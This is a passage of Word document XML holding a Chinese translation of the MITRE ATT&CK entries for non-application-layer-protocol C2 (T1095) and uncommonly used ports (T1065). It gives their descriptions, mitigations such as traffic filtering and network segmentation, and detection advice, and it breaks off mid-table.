              <w:t xml:space="preserve"> T1095</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34B973A0" w14:textId="3D57CF5F" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00A054E0">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A054E0">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4995A12F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A054E0">
              <w:t xml:space="preserve"> Windows, Linux, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C555CAC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A054E0">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机网络接口，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析，网络入侵检测系统，网络协议分析，网络抓包，进程网络访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41D0E8BC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="067D3B42" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00A054E0">
              <w:t>: Ryan Becwar</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D5706FB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A054E0">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27652730" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00003BCD" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E9D2D48" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E2750C" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用标准的非应用层协议进行主机与</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器之间或网络中受感染主机之间的通信。</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能的协议列表很广泛。具体示例包括使用网络层协议，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制消息协议（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ICMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），传输层协议（如用户数据报协议（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）），会话层协议（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket Secure</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SOCKS</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）），</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及重定向</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隧道协议，例如</w:t>
      </w:r>
      <w:r>
        <w:t>Serial over LAN</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SOL</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDF22FC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机之间的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ICMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信就是一个例子。</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ICMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议套件的一部分，因此需要所有与</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>兼容的主机实施</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是，它不像其他因特网协议（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2750C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）那样受到监视，并且可能被对手用来隐藏通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714DF2E3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2406"/>
        <w:gridCol w:w="7330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="3AB45C1C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2406" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="566BEA65" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7330" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="050C0F51" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00A054E0" w14:paraId="34444663" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="582"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2406" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="343E752A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>过滤网络流量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7330" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B21A1AD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>过滤网络流量以防止跨越网络边界使用不必要的协议。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00A054E0" w14:paraId="312F5557" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2406" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A4D03F4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>网络入侵防御</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7330" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="379D8620" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用网络签名识别特定恶意软件流量的网络入侵检测和防御系统可用于缓解网络级别的活动。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00A054E0" w14:paraId="76D7AA24" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2406" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FE9AAAA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络分段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7330" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42454793" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>正确配置防火墙和代理，以限制仅通过必要端口和适当的网络网关系统的传出流量。</w:t>
            </w:r>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>还要确保仅配置主机以通过授权接口进行通信。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AA71BD1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E2FAC5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ICMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息或包含异常数据的其他协议的网络流量，或者通常在网络内部或网络中看不到的网络流量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BB02E0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析不常见数据流的网络数据（例如，客户端发送的数据明显多于从服务器接收的数据）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用通常不具有网络通信或从未见过的网络的过程是可疑的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容以检测不遵循正在使用的端口的预期协议行为的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066A24C5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视和调查与启用和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或利用备用通信通道相关的功能的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D6C2DE" w14:textId="3964DCA1" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00A0413E" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB378F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不</w:t>
      </w:r>
      <w:r w:rsidR="00121FE9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常</w:t>
      </w:r>
      <w:r w:rsidR="00BC3074">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidR="005A12CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB378F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00A65911" w14:paraId="0FBA2AE7" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DFE70ED" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1065</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="653F095D" w14:textId="68307C5F" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E5729C0" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E972FB" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术网络流分析，网络进程使用，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06ECE4EC" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4916EE20" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="740C9B42" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22AD2DC9" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会通过非标准端口进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信，从而绕过配置不当的代理和防火墙。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C246C4" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00BC3074" w14:paraId="122256E4" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0021C9BD" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00BC3074" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3074">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2B4506CB" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00BC3074" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3074">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00A65911" w14:paraId="2D6C1AE1" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
